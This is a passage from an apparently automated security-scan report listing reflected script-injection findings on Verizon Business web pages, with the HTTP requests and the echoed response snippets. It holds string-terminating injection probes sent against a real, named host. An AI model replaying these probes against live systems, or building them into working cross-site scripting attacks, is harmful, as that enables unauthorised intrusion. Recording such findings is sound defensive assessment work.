This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about41438"%3b78c1125432/news/fast/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:51:35 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40628
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:51:35 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about41438";78c1125432/news/fast/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR S
...[SNIP]...

1.353. http://www.verizonbusiness.com/about/news/fast/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/fast/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1410'%3bffd96023f2b was submitted in the REST URL parameter 2. This input was echoed as f1410';ffd96023f2b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/newsf1410'%3bffd96023f2b/fast/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:44 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 47091
Date: Wed, 17 Nov 2010 00:52:45 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/about/newsf1410';ffd96023f2b/fast/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.354. http://www.verizonbusiness.com/about/news/fast/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/fast/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9017"%3b07c9e1b7171 was submitted in the REST URL parameter 2. This input was echoed as c9017";07c9e1b7171 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/newsc9017"%3b07c9e1b7171/fast/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:21 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 47093
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:52:22 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/newsc9017";07c9e1b7171/fast/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT
...[SNIP]...

1.355. http://www.verizonbusiness.com/about/news/fast/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/fast/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3cd1"%3b3eab779db3 was submitted in the REST URL parameter 3. This input was echoed as c3cd1";3eab779db3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/fastc3cd1"%3b3eab779db3/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:57 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49737
Date: Wed, 17 Nov 2010 00:52:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news/fastc3cd1";3eab779db3/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.356. http://www.verizonbusiness.com/about/news/fast/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/fast/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da11d'%3b9e784fdb48d was submitted in the REST URL parameter 3. This input was echoed as da11d';9e784fdb48d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/fastda11d'%3b9e784fdb48d/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:53:04 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 49739
Date: Wed, 17 Nov 2010 00:53:05 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:04 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/news/fastda11d';9e784fdb48d/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.357. http://www.verizonbusiness.com/about/news/globalarchive/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/globalarchive/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14914"%3b22ba1048635 was submitted in the REST URL parameter 1. This input was echoed as 14914";22ba1048635 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about14914"%3b22ba1048635/news/globalarchive/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:51:03 GMT
Content-Type: text/html
Content-Length: 40650
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:51:04 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about14914";22ba1048635/news/globalarchive/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEM
...[SNIP]...

1.358. http://www.verizonbusiness.com/about/news/globalarchive/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/globalarchive/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 209a7'%3b82f8e8ea37f was submitted in the REST URL parameter 1. This input was echoed as 209a7';82f8e8ea37f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about209a7'%3b82f8e8ea37f/news/globalarchive/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:51:25 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40648
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:51:25 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/about209a7';82f8e8ea37f/news/globalarchive/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.359. http://www.verizonbusiness.com/about/news/globalarchive/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/globalarchive/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e83c"%3b0a7ccedfc7b was submitted in the REST URL parameter 2. This input was echoed as 7e83c";0a7ccedfc7b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news7e83c"%3b0a7ccedfc7b/globalarchive/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:00 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47111
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:52:00 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:00 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news7e83c";0a7ccedfc7b/globalarchive/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.360. http://www.verizonbusiness.com/about/news/globalarchive/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/globalarchive/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba498'%3b597d7da9943 was submitted in the REST URL parameter 2. This input was echoed as ba498';597d7da9943 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/newsba498'%3b597d7da9943/globalarchive/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:31 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47109
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:52:31 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/about/newsba498';597d7da9943/globalarchive/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.361. http://www.verizonbusiness.com/about/news/globalarchive/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/globalarchive/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0f88"%3b5d15483965e was submitted in the REST URL parameter 3. This input was echoed as d0f88";5d15483965e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/globalarchived0f88"%3b5d15483965e/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:44 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49757
Date: Wed, 17 Nov 2010 00:52:44 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news/globalarchived0f88";5d15483965e/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.362. http://www.verizonbusiness.com/about/news/globalarchive/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/globalarchive/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c420'%3b4d7a7d8e8bf was submitted in the REST URL parameter 3. This input was echoed as 3c420';4d7a7d8e8bf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/globalarchive3c420'%3b4d7a7d8e8bf/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:53 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49757
Date: Wed, 17 Nov 2010 00:52:53 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/news/globalarchive3c420';4d7a7d8e8bf/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.363. http://www.verizonbusiness.com/about/news/media/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/media/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58838"%3b4ded86453f0 was submitted in the REST URL parameter 1. This input was echoed as 58838";4ded86453f0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about58838"%3b4ded86453f0/news/media/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:51:37 GMT
Content-Type: text/html
Content-Length: 40632
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:51:37 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about58838";4ded86453f0/news/media/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.364. http://www.verizonbusiness.com/about/news/media/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/media/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a564'%3bf81c63b536d was submitted in the REST URL parameter 1. This input was echoed as 8a564';f81c63b536d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about8a564'%3bf81c63b536d/news/media/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:10 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40634
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:52:10 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/about8a564';f81c63b536d/news/media/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.365. http://www.verizonbusiness.com/about/news/media/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/media/

Issue detail

